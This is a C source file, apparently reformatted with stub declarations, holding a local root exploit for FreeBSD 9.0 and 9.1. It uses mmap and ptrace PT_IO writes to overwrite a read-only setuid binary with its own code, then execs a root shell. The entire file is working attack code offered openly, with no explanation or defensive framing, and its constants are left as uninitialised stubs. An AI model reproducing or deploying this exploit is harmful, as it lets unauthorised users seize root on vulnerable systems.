
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;






struct stat {scalar_t__ st_size; } ;
struct ptrace_io_desc {char* piod_offs; char* piod_addr; scalar_t__ piod_len; int piod_op; } ;
typedef int pid_t ;
typedef int off_t ;
typedef int * caddr_t ;


 char* MAP_FAILED ;
 int MAP_NOSYNC ;
 int MAP_SHARED ;
 int O_RDONLY ;
 int PIOD_WRITE_D ;
 int PROT_READ ;
 int PT_ATTACH ;
 int PT_IO ;
 int PT_TRACE_ME ;
 char* SH ;
 char* TG ;
 int err (int,char*) ;
 int execl (char*,char*,int *) ;
 int fork () ;
 scalar_t__ geteuid () ;
 char* mmap (int *,size_t,int ,int,int,int ) ;
 int open (char*,int ) ;
 int printf (char*) ;
 int ptrace (int ,int,int *,int ) ;
 int setuid (int ) ;
 int stat (char*,struct stat*) ;
 int wait (int*) ;

int
main(int ac, char **av) {
   int from_fd, to_fd, status;
   struct stat st;
   struct ptrace_io_desc piod;
   char *s, *d;
   pid_t pid;

   if (geteuid() == 0) {
        setuid(0);
        execl(SH, SH, ((void*)0));
        return 0;
   }

   printf("FreeBSD 9.{0,1} mmap/ptrace exploit\n");
   printf("by Hunger <fbsd9lul@hunger.hu>\n");

   if ((from_fd = open(av[0], O_RDONLY)) == -1 ||
        (to_fd = open(TG, O_RDONLY)) == -1)
                err(1, "open");

   if (stat(av[0], &st) == -1)
        err(2, "stat");

   if (((s = mmap(((void*)0), (size_t)st.st_size, PROT_READ,
        MAP_SHARED, from_fd, (off_t)0)) == MAP_FAILED) ||
                (d = mmap(((void*)0), (size_t)st.st_size, PROT_READ,
                        MAP_SHARED|MAP_NOSYNC, to_fd, (off_t)0)) == MAP_FAILED)
                                err(3, "mmap");

   if ((pid = fork()) == -1)
        err(4, "fork");

   if (!pid) {
        if (ptrace(PT_TRACE_ME, pid, ((void*)0), 0) == -1)
                err(5, "ptraceme");

        return 0;
        }

   if (ptrace(PT_ATTACH, pid, ((void*)0), 0) == -1)
        err(6, "ptattach");

   if (wait(&status) == -1)
        err(7, "wait");

   piod.piod_op = PIOD_WRITE_D;
   piod.piod_offs = d;
   piod.piod_addr = s;
   piod.piod_len = st.st_size;

   if (ptrace(PT_IO, pid, (caddr_t)&piod, 0) == -1)
        err(8, "ptio");

   execl(TG, TG, ((void*)0));

   return 0;
}
